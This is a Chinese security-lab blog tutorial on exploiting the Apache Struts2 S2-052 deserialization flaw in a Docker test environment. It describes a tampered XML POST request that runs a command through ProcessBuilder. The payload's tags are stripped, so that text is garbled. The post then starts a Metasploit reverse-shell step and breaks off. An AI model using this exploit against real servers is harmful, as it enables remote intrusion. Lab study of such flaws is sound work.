Apache Struts2（S2-052）远程代码执行漏洞利用和修复建议

合天网安实验室发布时间：2017-09-06 19:14:53 ，浏览量：2

点击“合天智汇”关注，学习网安干货

话说哥们正吃着火锅唱着歌呢~~

突然瞥见微信群的信息“Struts2 S2-052 RCE。。。。”

赶紧放下筷子瞅一眼，

这Struts2真是不让人省心啊，

又双叒叕的出漏洞了~~~

你说出漏洞就出漏洞吧，

动不动就是远程代码执行，

心脏不好的估计吓死好几回了。

先看看漏洞简介：

2017年9月5日，Apache Struts发布最新安全公告，Apache Struts2的REST插件存在远程代码执行的高危漏洞，该漏洞由lgtm.com的安全研究员汇报，漏洞编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

官方介绍在这里：https://struts.apache.org/docs/s2-052.html

其他介绍各大小安全资讯网站都有了，这里就不多介绍了。（我感觉他们的速度比香港记者还快）

0x01 漏洞环境搭建

这里我偷懒，就用Docker搭建了（前提是你得有Docker环境）

镜像提供感谢：GitHub - Medicean/VulApps

快速搭建各种漏洞环境(Various vulnerability environment) https://github.com/Medicean/VulApps

拉取镜像：

docker pull medicean/vulapps:s_struts2_s2-052

构建环境：

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-052

这样两条命令就Ok了~~

0x02 漏洞利用

浏览器访问：http://ip/struts2-rest-showcase/

同时把抓包工具打开，Burpsuite 就行了。

然后随便选一个ID 进行编辑，比如选 3 进行编辑，

改好之后点 Submit

这时候，抓包工具这边就获取到了数据包了

来重放这个数据包，不过要改点东西。

首先我们把 Content-Type 改成 application/xml

构建POST数据如下：

0 false 0 /usr/bin/touch/tmp/hahaha false java.lang.ProcessBuilder start foo foo false 0 0 false false 0

划重点：要执行的命令在这里：

/usr/bin/touch/tmp/hahaha

作用在目标上新建一个文件

先看看目标上的文件

然后我们提交构建好的POST数据包。

提交之后返回很多报错信息

赶紧去目标机上看看。

Duang~~成功了。

0x03 漏洞利用姿势之反弹shell

这里借用 https://github.com/wvu-r7 提供的利用脚本。

翠花，上酸菜，啊~~呸~~上MSF

先下载模块：https://github.com/wvu-r7/metasploit-framework/blob/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb

话说好像我的msf也是在Docker里面（看来我是够懒的~~/手动捂脸）

use exploit/multi/http/struts2_rest_xstream